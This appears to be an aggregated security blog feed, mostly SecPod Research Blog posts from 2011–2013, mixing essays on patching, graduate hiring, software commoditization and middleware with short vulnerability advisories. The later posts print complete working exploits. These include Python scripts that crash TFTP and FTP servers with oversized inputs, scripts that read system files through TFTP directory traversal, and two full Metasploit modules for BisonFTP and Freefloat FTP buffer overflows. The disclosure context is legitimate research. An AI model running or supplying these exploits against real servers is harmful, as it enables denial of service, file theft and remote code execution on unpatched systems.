6. Not willing to take the hard step: patching and hardening is hard to do.

On the last point, yes, it is hard, because,

  • Users are not aware what patches to apply
  • It takes too long to download and install for each application
  • It takes away time from the core work
  • Not aware what the update might do

Hardening the security posture of the system, knowing the loopholes and applying the fix is a very effective and proven defense system. This requires a deeper or may be simpler, second look.

by Chandra at May 24, 2013 11:19 AM

April 22, 2013

SecPod Research Blog

Too much of an expectation?

Is it too much to expect an appropriate answer from Computer Science Engineering graduates for these questions,
- What does 32-bit computer really mean?
- What is word length?
- What is the length of a byte?
- What is the length of an IP address?
- What is the hardware address?
- What is the length of an Integer?

Most give us a blank look, puzzled that we ask such questions and wondering why at all we are worried about all these.

‘Sir, I have taken a Java course, why don’t you ask questions in that? Nobody ask these questions in the Interview, that’s why I didn’t prepare.’

Now, do you need preparation for these? Are these not elementary?

Alright, I oblige, is Java platform independent language?
‘Yes. ‘

How does Java achieve platform independence?
Puzzled again!

What was your favorite subject during your graduation?
C, C++

What about Non-Programming subject?
‘Non-programming, hmm…’

You didn’t study Operating System, Computer Networks?
‘Yes, but I haven’t prepared for it.’

Some questions to Electronics Engineering graduates which do not get answered,
- What is an ADC?
- Write an Adder circuit
- What is the RF range?

I understand, the industry as such as redefined “Computer Engineer” or “Software Engineer” to a greater extent that people often think, it is anybody who can remember a few things in Java, ASP.Net etc. Many Universities and Colleges have invented “Information Technology”, “Information Science” without actually helping the students understand the differences. It is also that Teaching is considered low-profile just like the belief that Testing is considered low-profile foolishly.

At SecPod, we are trying to solve Computer Security problems and we really need Computer Science Engineers. I am confident there are really good people out there and we are on the hunt for them.

by Chandra at April 22, 2013 01:20 PM

April 02, 2013

SecPod Research Blog

Software Commoditization

Commoditization, in business, is a term used when branded and unique software or goods in general become simple commodity in the eyes of market or consumers (source: wiki). As market matures, commoditization tends to increase.

Opportunities stemming from Software Commoditization

‘Necessity is the mother of all inventions’ is a well-said proverb that fits precisely to this argument. Now-a-days, prominence is given to integration of various hardware or solutions rather than programming a new. There is no necessity for fresh solutions right now. We have been benefited by hardware commoditization. There is a rise of PC clones, replacing integrated proprietary systems with interchangeable parts available from multiple sources. Novel solutions are rather needed, when cohesive solution works well in the market. The rise of middleware and operating systems help commoditize many software layers and components. Increase in free and open source software fuels commoditization.

Price of software and hardware solutions has reasonably reduced. These solutions have become affordable to common man, encouraging them to discover various prospects in this software industry. This has given rise to many entrepreneurs in this profession and numerous solutions that have been able to build on these open source commodities.

There is a significant increase in technology convergence and standardization. For example, bundling is a common aspect of software solutions. A proprietary solution is often bundled with a commoditized solution and gains popularity in the market. There is a steady increase in the usage of many Linux distributions – Red Hat, Ubuntu, etc.

Commoditized solutions act as a baseline for many other software solutions and are a point of reference. Innovations are still there, may not be traditional ones, but commoditization has geared up many companies by revolutionizing new ideas fabricated upon these commoditized components.

Limitations stemming from Software Commoditization

Low priced software often compromise on quality of software. Numerous bugs are identified and a constant need for enhancement exists.

There is a deficiency of funding in research and development in many companies. Innovations are not often from the scratch. Software professionals definitely need to design their approach to make use of existing free solution to maintain low cost.

Competitions in market are an obvious fact of commoditization. Almost everyone is trying to grab the market and scale well by quoting low prices. Disruptive technologies are evolving due to commoditization.

Strategies to adapt to Commoditization

  1. Bundling software is a very effective strategy. Proprietary software can be bundled with commoditized component to gain prominent status in market and win customers.
  2. Patents are often used as a strategy against commoditization. Trademarks, registered software and copyrights are some approaches used by companies to an advantage in market.
  3. Knowledge of middleware can facilitate opportunities for better growth in this era of software industry.
  4. Building a brand using commoditized components and leaving the rest to customer decision is often a safe approach. Example: using YouTube and blogs, or providing evaluation copy of software to demonstrate the power of our software can work well in this market.

Time has to be given to this trend to downsize. Many approaches and strategies can be listed here to adapt to commoditization. Software industry is maturing fast. Time changes drastically in this industry. There are no fixed set of rules. Every software professional must decide and analyze their stratagem to actualize their approach to acclimate to commoditization.

 

by Preeti Subramanian at April 02, 2013 11:50 AM

Benefits and Limitations of Middleware

Have you ever felt the ease of developing any application or idea that strikes your mind? Thanks to the evolution of middleware, that has helped us develop diverse software programs without perturbing ourselves about the core operating system or hardware.

Middleware is reusable infrastructure software residing between applications and the underlying operating systems, networks and hardware.

Benefits of Middleware

Middleware has primarily given us portability. It effectively manages memory allocation and relocation, data, processes, states, and replication. An assortment of applications can run at the same time. Parallel programming has become smooth to the tip of our fingers. It leverages hardware and software technological advances. It controls end-to-end resources and quality of service.

Numerous libraries cater to the basic or complex needs of our software. We are at ease; we can make the same piece of code work on any platform; we can program fast and there is less work. In the recent times, many applications have been developed with the help of readymade solutions and libraries offered by this layer. So development is quick, hence implementation time in the software life cycle has fairly reduced. Evolution of new requirements in software and environment is guaranteed with middleware.

There is a market for software developers who are hired for developing applications on middleware, Java developers, and Android developers. Also, the availability of such developers is vast, therefore hiring and putting them straight to work with some amount of basic training works well in many software companies.

Limitations of Middleware

For critical applications, performance is a major deciding factor for the application to ardour in this competitive world of abundant applications. In general, for many, performance might not be acute; hence it is generally a trade-off. Because of this middleware shield, we hardly get to design our software for performance. Most actions and decisions of memory management and resource usage are upheld with middleware, so penetrating to those levels of tailoring software is not possible.

With the genesis of middleware, large applications have evolved, sustaining of these remains a concern for software developers. We have a wide variety of programs to perform various tasks. It is required to put consistent time to support such software in long run.

Last but most important, there are competitive advantages of providing custom proprietary solutions. It makes it stand-out and precisely caters to real needs of customers. There is a certain demand for such software that needs to address tailored needs of clients. Getting employees to work such tasks is fairly difficult because it requires assured expertise.

Summarizing the above, it is the collective decision of architects and developers to elect what is the requirement of their software and what can be traded-off to best suit their needs.

by Preeti Subramanian at April 02, 2013 11:45 AM

March 09, 2013

Nth Dimension/:: Negatively discriminating against idiots since 1995!

A brief look at the Acer ChromeBook #2

In my previous post on the Acer ChromeBook, I discussed the Crosh shell. Today I'm going to examine another default extension which I mentioned previously which had caught my eye....

by timb@machine.org.uk (Tim Brown) at March 09, 2013 11:48 PM

January 08, 2013

SecPod Research Blog

Advantech WebAccess HMI/SCADA Persistence Cross-Site Scripting Vulnerability

SecPod Research Team member (Antu Sanadi) has found Persistence Cross-Site Scripting Vulnerability in Advantech WebAccess HMI/SCADA. The vulnerability is caused by improper validation ‘ProjDesc’ parameter in ‘broadWeb/include/gAddNew.asp’ (when tableName=pProject set). This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at January 08, 2013 06:51 AM

January 07, 2013

Nth Dimension/:: Negatively discriminating against idiots since 1995!

A brief look at the Acer ChromeBook #1

After some fairly heavy advertising from Google, I was recently persuaded to stump up the cash for an Acer ChromeBook. This post discusses some of my initial observations.Whilst the ChromeBook can be run in a developer mode, I have so far opted to avoid this, with the intention of hunting for bugs that can be exploited as a typical user. Most of my explorations so far have revolved around the default extensions that are shipped by default. Two in particular have caught my eye so far, notably the Crosh shell and the File application so let's look at them in a bit more depth....

by timb@machine.org.uk (Tim Brown) at January 07, 2013 03:12 AM

December 02, 2012

Nth Dimension/:: Negatively discriminating against idiots since 1995!

Dead bugs society

Background: A colleague asked me about fuzzing PHP. Verbatim from my email to security@php.net back in 2007:I've been doing some work on fuzzing the PHP 4 and PHP 5 parsers and wanted to share my results with you. I know PHP 4 won't be supported for much longer and I have no idea whether any of these examples are directly exploitable however before I make them public I thought it was only right to give you a chance to comment. Feel free to ignore me if you so choose, but I'll be putting them up on my blog in 14 days unless I hear otherwise. Although I'm reporting them against the CGI binary, I've had similar results running these snippets against the module too. In each case, I can cause the process (either the CGI binary or the module) to crash. The fuzzers I've written are also available if you so wish....

by timb@machine.org.uk (Tim Brown) at December 02, 2012 02:59 AM

September 19, 2012

Nth Dimension/:: Negatively discriminating against idiots since 1995!

A brief look at the RIM PlayBook

Disclaimer: I've only had a brief look at 1.x so far and only under VMware. I do have a PlayBook which I'll be breaking in due course but right now it's still in the box. These notes have been floating around in one form or another privately for a while but I wanted to commit them publicly since I'm not sure when I will find time to continue playing....

by timb@machine.org.uk (Tim Brown) at September 19, 2012 08:21 AM

July 16, 2012

SecPod Research Blog

Oxide Webserver Remote Denial of Service Vulnerability

SecPod Research Team member (Antu Sanadi) has found a Denial Of Service Vulnerability in Oxide Webserver. The vulnerability is caused by an error in handling some crafted characters in HTTP GET requests, which allows remote attackers to crash the service.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at July 16, 2012 10:34 AM

NetArt Media Pharmacy System SQL Injection and Cross-site Scripting Vulnerabilities

SecPod Research Team member (Antu Sanadi) has found Cross-Site Scripting and SQL Injection Vulnerabilities in NetArt Media Pharmacy System. The vulnerability is caused by improper validation of various parameters in multiple pages. This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at July 16, 2012 10:24 AM

NetArt Media iBoutique SQL Injection Vulnerability

SecPod Research Team member (Antu Sanadi) has found an SQL Injection Vulnerabilities in NetArt Media iBoutique. The vulnerability is caused by improper validation of ‘key’ parameter in ‘/index.php’. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at July 16, 2012 10:20 AM

June 20, 2012

SecPod Research Blog

Adiscon LogAnalyzer ‘highlight’ Parameter Cross Site Scripting Vulnerability

SecPod Research Team member (Sooraj K.S) has found Cross-Site Scripting Vulnerabilities in Adiscon LogAnalyzer. The vulnerability is caused by improper validation of “highlight” parameter in “index.php”. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

CVE Info : CVE-2012-3790

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at June 20, 2012 05:24 AM

March 30, 2012

SecPod Research Blog

ArticleSetup Multiple Persistence Cross-Site Scripting and SQL Injection Vulnerabilities

SecPod Research Team member (Antu Sanadi) has found Multiple Persistence Cross-Site Scripting and SQL Injection Vulnerabilities in ArticleSetup. The vulnerability is caused by improper validation of various parameters in multiple pages. This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at March 30, 2012 05:40 AM

JAMWiki ‘num’ Parameter Cross Site Scripting Vulnerability

SecPod Research Team member (Sooraj K.S) has found Cross-Site Scripting Vulnerabilities in JAMWiki. The vulnerability is caused by improper validation of “num” parameter in “Special:AllPages” pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at March 30, 2012 05:30 AM

February 28, 2012

SecPod Research Blog

Netmechanica NetDecision HTTP Server Denial Of Service Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found Denial Of Service Vulnerability in Netmechanica NetDecision HTTP Server. The vulnerability is caused due to improper validation of long malicious HTTP request to web server, which allows remote attackers to crash the service.

POC : Download here.

More information can be found here.

CVE Info : CVE-2012-1465

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at February 28, 2012 05:09 AM

Netmechanica NetDecision Traffic Grapher Server Information Disclosure Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found Information Disclosure Vulnerability in Netmechanica NetDecision Traffic Grapher Server. The vulnerability is caused due to improper validation of malicious HTTP GET request to Traffic Grapher Server ‘default.nd’ with invalid HTTP version number followed by multiple ‘CRLF’, which discloses the source code of ‘default.nd’

POC : Download here.

More information can be found here.

CVE Info : CVE-2012-1466

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at February 28, 2012 05:04 AM

Netmechanica NetDecision Dashboard Server Information Disclosure Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found Information Disclosure Vulnerability in Netmechanica NetDecision Dashboard Server. The vulnerability is caused due to improper validation of malicious HTTP request to Dashboard server appended with ‘?’ character, which discloses the Dashboard server’s web script physical path.

POC : Download here.

More information can be found here.

CVE Info : CVE-2012-1464

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at February 28, 2012 04:57 AM

February 01, 2012

SecPod Research Blog

OfficeSIP Server Denial Of Service Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found Denial Of Service Vulnerability in OfficeSIP Server. The vulnerability is caused due to improper validation of SIP/SIPS URI in the ‘To’ header of the request. The flaw can be exploited to crash the service.

POC : Download here.

More information can be found here.

CVE Info : CVE-2012-1008

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at February 01, 2012 09:26 AM

NetSarang Xlpd Printer Daemon Denial of Service Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found Denial of Service Vulnerability in NetSarang Xlpd Printer Daemon. The vulnerability is caused due to improper validation of malicious LPD request sent to printer daemon. The flaw can be exploited to crash the service.

POC : Download here.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at February 01, 2012 09:21 AM

Sphinix Mobile Web Server Multiple Persistence XSS Vulnerabilities

SecPod Research Team member (Prabhu S Angadi) has found Multiple Persistence Cross-Site Scripting Vulnerabilities in Sphinix Mobile Web Server Blog. The vulnerability is caused by improper validation of “comment” parameter in “/Blog/MyFirstBlog.txt” and “/Blog/AboutSomething.txt” pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at February 01, 2012 09:14 AM

Apache Struts Multiple Persistence Cross-Site Scripting Vulnerabilities

SecPod Research Team member (Antu Sanadi) has found Multiple Persistence Cross-Site Scripting Vulnerabilities in Apache Struts. The vulnerability is caused by improper validation of various parameters in multiple pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at February 01, 2012 09:08 AM

December 02, 2011

SecPod Research Blog

Ipswitch TFTP Server Directory Traversal Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found a Directory Traversal vulnerability in Ipswitch TFTP Server. The vulnerability is caused due to improper validation of ‘Read’ request containing ‘../’ sequences. The flaw can be exploited to read arbitrary files via directory traversal attacks.

POC : Download here.

More information on the flaws can be found here.

#!/usr/bin/python
##############################################################################
# Title     : Ipswitch TFTP Server Directory Traversal Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.whatsupgold.com/index.aspx
# Advisory  : http://secpod.org/blog/?p=424
#             http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
#             http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py
# Version   : Ipswitch TFTP Server 1.0.0.24
# Date      : 02/12/2011
##############################################################################

import sys, socket

def sendPacket(HOST, PORT, data):
    '''
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    '''

    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()

    return data

if __name__ == "__main__":

    if len(sys.argv)  2:
        print '\tUsage: python exploit.py target_ip'
        print '\tExample : python exploit.py 127.0.0.1'
        print '\tExiting...'
        sys.exit(0)

    HOST = sys.argv[1]                               ## The Server IP
    PORT = 69                                        ## Default TFTP port

    data = "\x00\x01"                                ## TFTP Read Request
    data += "../" * 10 + "boot.ini" + "\x00"         ## Read boot.ini file using directory traversal
    data += "netascii\x00"                           ## TFTP Type

    ## netascii
    rec_data = sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    print rec_data.strip()

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at December 02, 2011 06:21 AM

GoAhead WebServer Multiple Cross Site Scripting Vulnerabilities

SecPod Research Team member (Prabhu S Angadi) has found Multiple Cross Site Scripting Vulnerabilities in GoAhead WebServer. The vulnerability is caused by improper validation of input to ‘name’ & ‘address’ parameters in /goform/formTest page. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at December 02, 2011 06:14 AM

Hillstone Software HS TFTP Server Denial Of Service Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found Denial Of Service Vulnerability in Hillstone Software HS TFTP Server. The vulnerability is caused due to improper validation of WRITE/READ Request Parameter containing long file name. The flaw can be exploited to crash the service.

POC : Download here.

More information on the flaws can be found here.

#!/usr/bin/python
##############################################################################
# Title     : Hillstone Software HS TFTP Server Denial Of Service Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.hillstone-software.com/hs_tftp_details.htm
# Advisory  : http://secpod.org/blog/?p=419
#             http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt
#             http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py
# Version   : Hillstone Software HS TFTP 1.3.2
# Date      : 02/12/2011
##############################################################################

import socket,sys,time

port   = 69
target = raw_input("Enter host/target ip address: ")

if not target:
    print "Host/Target IP Address is not specified"
    sys.exit(1)

print "you entered ", target

try:
    socket.inet_aton(target)
except socket.error:
    print "Invalid IP address found ..."
    sys.exit(1)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"
    sys.exit(1)

## File name >= 222 length leads to crash
exploit = "\x90" * 2222

mode = "binary"
print "File name WRITE/READ crash"

## WRITE command = \x00\x02
data = "\x00\x02" + exploit + "\0" + mode + "\0"

## READ command = \x00\x01
## data = "\x00\x01" + exploit + "\0" + mode + "\0"

sock.sendto(data, (target, port))
time.sleep(2)
sock.close()
try:
    sock.connect()
except:
    print "Remote TFTP server port is down..."
    sys.exit(1)

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at December 02, 2011 05:56 AM

September 07, 2011

SecPod Research Blog

Metasploit Module – BisonFTP Server Remote Buffer Overflow Vulnerability

SecPod Research Team member (Veerendra G.G) wrote Metasploit module for BisonFTP Server Remote Buffer Overflow Vulnerability.

Metasploit : Download here.


##
# $Id: bison_server_bof.rb 2011-08-19 03:13:45Z veerendragg $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'BisonFTP Server Remote Buffer Overflow Vulnerability',
			'Description'    => %q{
					This module exploits a buffer overflow vulnerability
					found in the BisonFTP Server <= v3.5 .
			},
			'Author'         =>
				[
					'localh0t',		# Initial PoC
					'veerendragg @ SecPod',	# Metasploit Module
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1.0 $',
			'References'     =>
				[
					[ 'BID', '49109'],
					[ 'CVE', '1999-1510'],
					[ 'URL', 'http://secpod.org/blog/?p=384'],
					[ 'URL', 'http://www.exploit-db.com/exploits/17649'],
					[ 'URL', 'http://secpod.org/msf/bison_server_bof.rb'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space' => 388,
					'BadChars' => "\x00\x0a\x0d",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows XP SP3 EN',
						{
							'Ret' => 0x0040333f, # call edx from Bisonftp.exe
							'Offset' => 1432
						}
					],
				],
			'DisclosureDate' => 'Aug 07 2011',
			'DefaultTarget'	=> 0))
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")
		print_status("Connected to #{datastore['RHOST']}:#{datastore['RPORT']}")
		sploit = rand_text_alpha(1028)					## Random Buffer
		sploit << "\x90" * 16						## Padding
		sploit << payload.encoded					## Encoded Payload
		sploit << "\x90" * (388 - payload.encoded.length)		## More Nops
		sploit << [target.ret].pack('V')				## Return Address
		sploit << rand_text_alpha(39)					## More Buffer

		print_status("Sending payload...")
		sock.put(sploit)

		handler
		disconnect
	end

end

Welcome any feedback or suggestion.
Cheers!
SecPod Research Team

by Veerendra GG at September 07, 2011 03:12 PM

Metasploit Module – Freefloat FTP Server APPE Command Overflow

SecPod Research Team member (Veerendra G.G) wrote Metasploit module for Freefloat FTP Server APPE Command Overflow Vulnerability.

Metasploit : Download here.


##
# $Id: freefloat_ftp_apee_cmd.rb 2011-07-19 03:13:45Z veerendragg $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Freefloat FTP Server APPE Command Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow vulnerability
					found in the APPE command in the Freefloat FTP server.
			},
			'Author'         =>
				[
					'veerendragg @ SecPod',	# Initial Discovery
					'veerendragg @ SecPod'	# Metasploit Module
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1.0 $',
			'References'     =>
				[
					[ 'URL', 'http://secpod.org/blog/?p=310' ],
					[ 'URL', 'http://secpod.org/blog/?p=353' ],
					[ 'URL', 'http://secpod.org/msf/freefloat_ftp_apee_cmd.rb'],
					[ 'URL', 'http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space' => 500,
					'BadChars' => "\x00\x0a\x0d",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows XP SP3 EN',
						{
							'Ret' => 0x7e429353, # jmp esp from user32.dll
							'Offset' => 246
						}
					],
				],
			'DisclosureDate' => 'Aug 07 2011',
			'DefaultTarget'	=> 0))
	end

	def exploit
		connect_login
		print_status("Trying target #{target.name}...")
		buf = make_nops(target['Offset'])
		buf << [target.ret].pack('V')
		buf << make_nops(30)
		buf << payload.encoded

		print_status("Sending exploit buffer...")
		send_cmd( ['APPE', buf] , false )

		handler
		disconnect
	end

end

Welcome any feedback or suggestion.
Cheers!
SecPod Research Team

by Veerendra GG at September 07, 2011 01:24 PM

Xataface WebAuction and Xataface Librarian DB Multiple Vulnerabilities

SecPod Research Team member (Antu Sanadi) has found Multiple Vulnerabilities in Xataface WebAuction and Xataface Librarian DB. The vulnerability is caused by improper validation of various parameters in several pages. This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

More information on the flaws can be found here.

by Veerendra GG at September 07, 2011 01:06 PM

MYRE Real Estate Software Multiple XSS and SQL Injection Vulnerabilities

SecPod Research Team member (Sooraj K.S) has found Multiple XSS and SQL Injection Vulnerabilities in MYRE Real Estate Software. The vulnerability is caused by improper validation of various parameters in several pages. This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

More information on the flaws can be found here.

by Veerendra GG at September 07, 2011 12:59 PM

Apache ActiveMQ Source Code Disclosure Vulnerability

SecPod Research Team member (Veerendra G.G) has found information disclosure vulnerability in Apache ActiveMQ. The flaws are caused due to input validation errors while processing URL, which can be exploited to view the source code of a visited page and leads to further attacks.

More information on the flaws can be found here.

by Veerendra GG at September 07, 2011 12:07 PM

August 04, 2011

SecPod Research Blog

Freefloat FTP Server POST Auth Multiple Commands Buffer Overflow Vulnerabilities

SecPod Research Team member (Veerendra G.G) has found multiple Buffer Overflow vulnerabilities in Freefloat FTP Server. The flaws are caused due to input validation errors while processing DELE, MDTM, RETR, RMD, RNFR, RNTO, STOU, STOR, SIZE, APPE, STAT commands. The buffer is overflown by sending overly long command arguments, which can be exploited to execute arbitrary code or crash a vulnerable server denying service to legitimate users.

POC : Download here.

More information on the flaws can be found here.


#!/usr/bin/python
##############################################################################
# Title     : Freefloat FTP Server Multiple Buffer Overflow Vulnerabilities
# Author    : Veerendra G.G from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.freefloat.com/sv/utilities-tools/utilities-tools.php
# Advisory  : http://secpod.org/blog/?p=310
#             http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py
#             http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt
# Version   : Freefloat FTP Server Version 1.0
# Date      : 21/07/2011
##############################################################################

import sys, socket

def exploit(HOST, PORT, CMD):
    try:
        tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        tcp_sock.connect((HOST, PORT))
    except Exception, msg:
        print "[-] Not able to connect to : " , HOST
        sys.exit(0)

    res = tcp_sock.recv(1024)

    if "220 FreeFloat" not in res:
        print "[-] FreeFloat FTP Server Not Found..."
        tcp_sock.close()
        sys.exit(0)

    tcp_sock.send("USER test\r\n")
    tcp_sock.recv(1024)
    tcp_sock.send("PASS test\r\n")
    tcp_sock.recv(1024)

    tcp_sock.send(CMD + " "+ "A" * 1000 + "\r\n")
    tcp_sock.close()

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print "\t[-] Usage: python exploit.py target_ip"
        print "\t[-] Example : python exploit.py 127.0.0.1"
        print "\t[-] Exiting..."
        sys.exit(0)

    HOST = sys.argv[1]
    PORT = 21

    ## Vulnerable Commands
    CMDs = ["DELE", "MDTM", "RETR", "RMD", "RNFR",
            "RNTO", "STOU", "STOR", "SIZE", "APPE", "STAT"]

    for CMD in CMDs:
        print "[+] Connecting with server..."
        exploit(HOST, PORT, CMD)
        print "[+] Exploit Sent with %s command..." %(CMD)
        print "[+] Checking Server Crashed or not..."

        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((HOST, PORT))
            s.close()
        except Exception, msg:
            print "[+] Server Crashed with %s Command" %(CMD)
            sys.exit(0)

Welcome any feedback or suggestion.
Cheers!
SecPod Research Team

by Veerendra GG at August 04, 2011 02:06 PM

CiscoKits TFTP Server Directory Traversal Vulnerability

SecPod Research Team member (Antu Sanadi) has found a Directory Traversal vulnerability in CiscoKits CCNA TFTP Server. The vulnerability is caused due to improper validation of ‘Read’ request containing ‘../’ sequences. The flaw can be exploited to read arbitrary files via directory traversal attacks.

POC : Download here.

More information on the flaws can be found here.


#!/usr/bin/python
##############################################################################
# Title     : CiscoKits TFTP Server Directory Traversal Vulnerability
# Author    : Antu Sanadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.certificationkits.com/cisco-ccna-tftp-server/
# Advisory  : http://secpod.org/blog/?p=301
#             http://secpod.org/SECPOD_CiscoKits_TFTP_Server_Dir_Trav_POC.py
#             http://secpod.org/advisories/SECPOD_CiscoKits_TFTP_Server_Dir_Trav.txt
# Version   : CiscoKits CCNA TFTP Server 1.0.0.0
# Date      : 21/07/2011
##############################################################################
import sys, socket

def sendPacket(HOST, PORT, data):
    '''
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    '''
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()
    return data

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print "\tUsage: python exploit.py target_ip"
        print "\tExample : python exploit.py 127.0.0.1"
        print "\tExiting..."
        sys.exit(0)

    HOST = sys.argv[1]                        ## The Server IP
    PORT = 69                                 ## Default TFTP port

    data = "\x00\x01"                         ## TFTP Read Request
    data += "../" * 10 + "windows/win.ini" + "\x00"  ## Read boot.ini file using directory traversal
    data += "netascii\x00"                    ## TFTP Type

    # netascii
    rec_data = sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    print rec_data.strip()

Welcome any feedback or suggestion.
Cheers!
SecPod Research Team

by Veerendra GG at August 04, 2011 01:37 PM

CiscoKits CCNA TFTP Server Denial Of Service Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found a Denial of Service vulnerability in CiscoKits CCNA TFTP Server. The vulnerability is caused due to improper validation of WRITE Request Parameter containing long file name. The flaw can be exploited to crash a vulnerable server denying service to legitimate users.

POC : Download here.

More information on the flaws can be found here.


#!/usr/bin/python
##############################################################################
# Title    : CiscoKits CCNA TFTP Server Denial Of Service Vulnerability
# Author   : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor   : http://www.certificationkits.com/cisco-ccna-tftp-server/
# Advisory : http://secpod.org/blog/?p=271
#            http://secpod.org/SECPOD_CiscoKits_CCNA_TFTP_DoS_POC.py
#            http://secpod.org/advisories/SECPOD_Ciscokits_CCNA_TFTP_DoS.txt
# Version  : CiscoKits CCNA TFTP Server 1.0.0.0
# Date     : 21/07/2011
##############################################################################

import socket,sys,time

port   = 69
target = raw_input("Enter host/target ip address: ")

if not target:
    print "Host/Target IP Address is not specified"
    sys.exit(1)

print "you entered ", target

try:
    socket.inet_aton(target)
except socket.error:
    print "Invalid IP address found ..."
    sys.exit(1)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"
    sys.exit(1)

#File name >= 222 length leads to crash
exploit = "A" * 500

mode = "netascii"
print "File name WRITE crash"
# WRITE command = \x00\x02
data = "\x00\x02" + exploit + "\0" + mode + "\0"
sock.sendto(data, (target, port))
time.sleep(5)

Welcome any feedback or suggestion.
Cheers!
SecPod Research Team

